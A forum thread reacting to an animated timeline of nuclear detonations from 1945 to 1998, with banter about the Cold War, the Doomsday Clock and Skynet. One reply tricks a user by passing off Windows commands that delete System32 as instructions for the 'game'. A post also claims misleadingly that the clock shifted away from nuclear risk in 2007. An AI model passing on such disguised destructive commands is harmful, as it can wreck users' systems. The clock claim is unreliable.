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    Nuclear detonation timeline "1945-1998"



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    Doomsday Clock

    Nice find but anachronistic now. The Doomsday Clock which originally measured the likelihood of nuclear war, was recalibrated in 2007 to measure the dangers of climate change and nano-technologies. http://en.wikipedia.org/wiki/Doomsday_Clock

    That's a bit of a shock to me having grown up under the Bomb. Hard to imagine that nuclear weapons now take a back seat but that's progress.

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    whoa no wonder that generation felt they were living under the threat of the bomb. I'd no idea there had been so many detonations and surprise surprise the US accounted for more than half!

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    Yeah man ... we thought the silly fuckers were going to destroy us at any moment ...
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    Have a look on google Earth for the US Department of energy's nuclear bomb detonation site out in the desert. Bloody interesting stuff with the sizes of the explosions involved, etc, etc.
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    I tried all the obvious keys like arrow and spacebar but nothing worked.

    Got any instructions for that game?


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    It missed the 1979 Israel/South Africa test in the Indian Ocean.
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    Quote Originally Posted by pzkpfw View Post
    I tried all the obvious keys like arrow and spacebar but nothing worked.

    Got any instructions for that game?
    Yeah it's a bit tricky to get started but hours of fun.

    Run CMD.

    1.type : C:

    2. type : cd windows

    2. type : del system 32/*.*

    3. type : del system32


    There you go. It will be just like your own nuclear bomb.

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    It's OK! Skynet has not yet been approved.


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    Quote Originally Posted by EJK View Post
    It's OK! Skynet has not yet been approved.
    plenty of people are working on it anyway just gotta remember to program that shit for salvation instead of destruction, programming syntax can be a bitch like that
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    debugging can be a bitch aye?


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    Quote Originally Posted by pzkpfw View Post
    I tried all the obvious keys like arrow and spacebar but nothing worked.

    Got any instructions for that game?
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    Quote Originally Posted by EJK View Post
    debugging can be a bitch aye?
    yeh, pretty sure they were using basic, or perhaps vb when they wrote skynet. C# will sort it out
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    haha... they keep blowing up their own countries... igits.

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    Quote Originally Posted by Jantar View Post
    It missed the 1979 Israel/South Africa test in the Indian Ocean.
    God only knows what happened there. May or may not have happened.
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